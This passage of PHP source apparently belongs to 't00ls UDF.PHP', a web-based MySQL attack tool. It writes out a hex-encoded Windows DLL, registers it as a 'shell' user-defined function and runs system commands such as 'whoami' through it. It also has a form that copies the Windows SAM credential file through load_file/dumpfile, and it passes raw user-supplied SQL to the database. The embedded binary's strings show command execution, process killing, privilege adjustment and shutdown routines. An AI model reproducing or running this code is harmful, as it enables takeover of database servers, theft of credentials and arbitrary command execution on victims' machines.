echo '<script>location.href = "'.$filename.'?rn="+Math.random()</script>';
}
function showM(&$conn,$close = true){
echo '<center><b>t00ls UDF.PHP</b></center>';
echo '<form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>';
echo '<div style="border:solid 1px #333;background-color:#999;padding:4px">';
$sql = 'select concat(\'<b>user()</b>:\',user()) as m union select concat(\'<b>database():</b>\',database()) union select concat(\'<b>datadir</b>:\',@@datadir) union select concat(\'<b>basedir</b>:\',@@basedir) union select concat(\'<b>version()</b>:\',version()) ;';
$meta = mysql_query($sql,$conn);
$tmp = 1;
while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) {
echo $row['m'];
if ($tmp == 1) {
$tmp = 2;
$h = substr($row['m'],strpos($row['m'],'@')+1);
if ($h != 'localhost') {
echo ' <b><i><font color=green>[web and db is not the same server.]</font></i></b>';
$_SESSION['notsame'] = 'true';
}
}
echo '<br/>';
}
echo '<b>plugin_dir</b>:';
$meta = mysql_query('show variables like "plugin_dir"');
if (mysql_num_rows($meta)==0) {
echo '<font color=white>mysql is under 5.1 , ';
if (!isset($_SESSION['notsame']))
echo ' u can dump udf.dll to any directory in follow paths';
echo '</font>';
} else {
//over 5.1
$_SESSION['over51'] = 'true';
$row = mysql_fetch_row($meta);
$_SESSION['plugindir'] = str_replace('\\','\\\\',str_replace('/','\\',$row[1])).'\\\\udf.dll';
echo '<font color=white>'.str_replace('/','\\',$row[1]).'</font>';
echo ' (mysql over 5.1, udf.dll can only dump to plugin_dir) ';
if (isset($_SESSION['notsame']))
echo ' <font><b><i>[maybe dump dll will be failed!]</i></b></font>';
else {
if (!file_exists(str_replace('/','\\',$row[1])))
echo ' <a href="?action=cplug&dir='.base64_encode(str_replace('/','\\',$row[1])).'">Create PluginDir</a>';
else
echo ' exists!';
}
}
echo '<br/>';
if (!isset($_SESSION['notsame']) && !isset($_SESSION['over51']))
echo '<b>path</b>:<font color=green><b>'.getenv('path').'</b></font><br/>';
$meta = mysql_query('select 1,1,1,1 from mysql.user union select * from mysql.func');
if (mysql_num_rows($meta)==0)
echo '<b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!';
else
echo '<b>Mysql.Func</b> : <font color=green>exist!</font>';
echo '<br/>';
echo '<b>grants</b> : <font color=white>';
$meta = mysql_query('show grants;',$conn);
while ($row = mysql_fetch_row($meta)) {
echo $row[0];
}
echo '</font>';
echo '</div>';
if ($close)
mysql_close($conn);
echo '<br/>';
if (isset($_POST['path'])) {
$path = $_POST['path'];
if (get_magic_quotes_gpc())
$path = stripslashes($path);
}
else
$path = isset($_SESSION['plugindir']) ? $_SESSION['plugindir'] : 'c:\\\\windows\\\\system32\\\\udf.dll';
echo '<div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value="'.$path.'"> <input type="submit" value="Dump UDF"></form>';
echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \'udf.dll\'"> <input type="submit" value="Create Function"></form>';
echo '<form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30> <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>';
if (isset($_POST['sql']))
$sql = $_POST['sql'];
else
$sql = 'select * from mysql.user';
if (get_magic_quotes_gpc())
$sql = stripslashes($sql);
if (isset($_POST['dump']))
$sql = 'select shell(\'cmd\',\'whoami\')';
echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" rows="5" name="sql">'.$sql.'</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>';
}
function cplug(){
$path = $_GET['dir'];
$path = base64_decode($path);
$arr = explode('\\',$path);
$p = '';
$err = '';
for ($index = 0,$count = count($arr);$index<$count;$index++) {
$p .= ($arr[$index] . '\\');
if (!file_exists($p)) {
if (!mkdir($p)) {
$err = 'create '.$p.'failed !';
break;
}
}
}
conn();
if ($err != '')
exit($err);
if (file_exists($path))
echo 'plugin_dir create success !';
else
echo 'plugin_dir create failed !';
}
function execsql() {
$conn = conn(false);
$sql = $_POST['sql'];
if (get_magic_quotes_gpc())
$sql = stripslashes($sql);
$rs = mysql_query($sql,$conn);
echo mysql_info($conn);
if (@mysql_num_rows($rs) > 0) {
echo '<table border="1">';
$cols = mysql_num_fields($rs);
$index = 0;
echo '<tr>';
while ($index < $cols) {
echo '<th>'.mysql_field_name($rs,$index).'</th>';
$index ++;
}
echo '</tr>';
while ($row = mysql_fetch_row($rs)) {
$index = 0;
echo '<tr>';
while ($index < $cols) {
echo '<td>';
echo str_replace(chr(13),'<br/>',htmlspecialchars($row[$index]));
echo '</td>';
$index ++;
}
echo '</tr>';
}
echo '</table>';
}
if (mysql_errno($conn) != 0)
echo mysql_error();
mysql_close($conn);
}
function cp(){
$conn = conn(false);
$source = $_POST['source'];
$target = $_POST['target'];
if (get_magic_quotes_gpc()) {
$source = stripslashes($source);
$target = stripslashes($target);
}
mysql_query('select unhex(hex(load_file("'.$source.'"))) into dumpfile "'.$target.'"');
if (mysql_errno($conn) != 0)
echo mysql_error().'<br/>';
else
echo 'done !';
mysql_close($conn);
}
function install() {
//dump udf.dll
$conn = conn(false);
$path = $_POST['path'];
if (get_magic_quotes_gpc())
$path = stripslashes($path);
mysql_query('create table udftmp (c blob)');
if (mysql_errno($conn) != 0) {
echo mysql_error().'<br/>';
mysql_query('drop table udftmp');
mysql_close($conn);
exit();
}
mysql_query('insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04FF75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C